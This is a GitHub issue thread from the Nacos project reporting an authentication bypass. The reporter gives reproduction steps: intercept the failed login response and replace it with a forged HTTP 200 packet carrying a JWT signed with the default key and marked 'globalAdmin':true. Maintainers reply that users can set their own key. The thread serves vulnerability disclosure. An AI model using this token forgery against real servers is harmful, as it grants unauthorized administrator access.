-
Notifications
You must be signed in to change notification settings - Fork 13k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Found a login background vulnerability #7182
Comments
Could you please give me a way to communicate privately? I don't think it is appropriate to discuss this in issues |
The reason I can log into the background is because of the default key |
Thanks for your feedback and contribution. But the issue/pull request has not had recent activity more than 180 days. This issue/pull request will be closed if no further activity occurs 7 days later. |
There is no discussion for a long time, mean community don't think this is a problem. In fact, the token is same as you user and password, if you want to get higher security request, you can implement your own auth plugin after 2.1.0 version. |
In fact, I don't think this problem is a vulnerability. Users can set their own But the CVE has include this issue, we just comment the solution:
|
The steps to reproduce.可复现问题的步骤
1.Download the latest version of NacOS
data:image/s3,"s3://crabby-images/8c301/8c301cccdaf64d2a156a1d8b4f4d67e941410fdd" alt="image"
data:image/s3,"s3://crabby-images/32f09/32f09baab1989029bb01c21243ede6ea122ab24a" alt="image"
data:image/s3,"s3://crabby-images/d8c63/d8c63c2617c51d897ef34e028295de09e869365f" alt="image"
data:image/s3,"s3://crabby-images/6803a/6803a46ab5125f68bcea36b1037e9933a9d3fe9a" alt="image"
data:image/s3,"s3://crabby-images/c03b2/c03b2b48bbf35579f272dd4b182b8c5e41aa70b6" alt="image"
data:image/s3,"s3://crabby-images/f99da/f99da3830cd4faf4e37b38ac89a0541253763dbd" alt="image"
https://github.com/alibaba/nacos/
2.Follow the steps for installation
3.After the installation is successful, access the default login page
4.Enter any account and password
Click login and the login failed
5.Caught at login time
Intercepting return packet
The intercepted return packet is
6.Replace returns the package and lets it pass
The packet is:
HTTP/1.1 200
Server: nginx/1.19.6
Date: Sun, 11 Apr 2021 01:48:17 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://47.93.46.78:9090
Access-Control-Allow-Credentials: true
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Content-Length: 162
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}
7.At this point you can see that you have successfully entered the background
data:image/s3,"s3://crabby-images/c0274/c027442bbeec116f64a9a45e880b565ad1ff5c8a" alt="image"
The reason for this problem is that NACOS uses the default JWT key
The text was updated successfully, but these errors were encountered: